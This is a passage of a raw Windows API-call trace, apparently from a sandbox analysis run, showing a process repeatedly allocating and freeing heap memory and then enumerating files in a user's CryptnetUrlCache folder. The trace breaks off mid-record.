HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.782] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.799] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0199.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0199.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0199.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0199.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.808] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0199.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0199.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0199.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.811] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\") returned="Content\\" [0199.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bca0 [0199.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.812] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0199.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bca0 | out: hHeap=0x2c0000) returned 1 [0199.812] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0199.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0199.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.813] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0199.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adeaa0 [0199.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.813] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0199.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adeaa0 | out: hHeap=0x2c0000) returned 1 [0199.814] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.814] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.814] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.814] PathFindFileNameW (pszPath="") returned="" [0199.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3aa000 [0199.814] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05de8 [0199.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa000 | out: hHeap=0x2c0000) returned 1 [0199.934] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xbf572320, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbf572320, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.934] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5d876470, ftCreationTime.dwHighDateTime=0x1d706ad, ftLastAccessTime.dwLowDateTime=0x5d876470, ftLastAccessTime.dwHighDateTime=0x1d706ad, ftLastWriteTime.dwLowDateTime=0x5d876470, ftLastWriteTime.dwHighDateTime=0x1d706ad, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0199.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0199.934] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0199.934] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xab8c1ed0, ftCreationTime.dwHighDateTime=0x1d706ae, ftLastAccessTime.dwLowDateTime=0xab8c1ed0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xab8c1ed0, ftLastWriteTime.dwHighDateTime=0x1d706ae, nFileSizeHigh=0x0, nFileSizeLow=0x475, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0199.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0199.935] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\37C951188967C8EB88D99893D9D191FE") returned="" [0199.935] FindNextFileW (in: hFindFile=0x2a05de8, lpFindFileData=0x2f9fba4 | out: 